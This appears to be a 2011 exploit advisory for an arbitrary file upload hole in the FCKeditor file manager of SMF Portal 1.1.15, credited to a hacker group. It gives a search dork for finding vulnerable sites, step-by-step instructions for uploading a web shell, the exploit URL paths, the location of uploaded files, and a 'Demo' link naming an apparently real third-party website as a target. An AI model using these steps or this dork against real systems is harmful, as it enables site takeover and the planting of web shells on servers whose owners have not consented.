SMF Portal 1.1.15 Shell Upload

` In The Name Of GOD  
  
==============================================================================  
  
SMF Portal 1.1.15 (fckeditor) Arbitrary File Upload Vulnerability  
  
==============================================================================  
  
[»] Title : [ SMF Portal 1.1.15 (fckeditor) Arbitrary File Upload Vulnerability ]  
  
[»] TestedON: [ LINUX ]  
  
[»] Download: [ http://www.simplemachines.org/ ]  
  
[»] Author : [ HELLBOY }  
  
[»] Email : [ [email protected] ]  
  
[»] Date : [ 2011-12-2 ]  
  
[»] Version : [ 1.1.15 ]  
  
[»] Dork : [ "Powered by SMF 1.1.15" ]  
  
###########################################################################  
  
InformatioN :  
  
1. Go to url : http://Target/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php  
  
2. SELECT You'r Shell and Click OK.  
  
3. Formats can be uploaded (Php6,Jpg,gif,Xml,...)  
  
4. Uploaded File Location : Target.com/tp-images/File/File Name  
  
###########################################################################  
  
===[ Exploit ]===  
  
[»] http://Target/[patch]/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php  
  
[»] http://Target/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php  
  
===[ Demo ]===  
  
[»] http://theartglassfactory.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php  
  
===[ We Are : ./Iranian HackerZ ]===   
  
Greetz : BLACK.VIPER , SKOTE_VAHSHAT , KINGCOPE  
  
TBH : HELLBOY , BLACK.VIPER , SKOTE_VAHSHAT , KINGCOPE  
  
###########################################################################  
`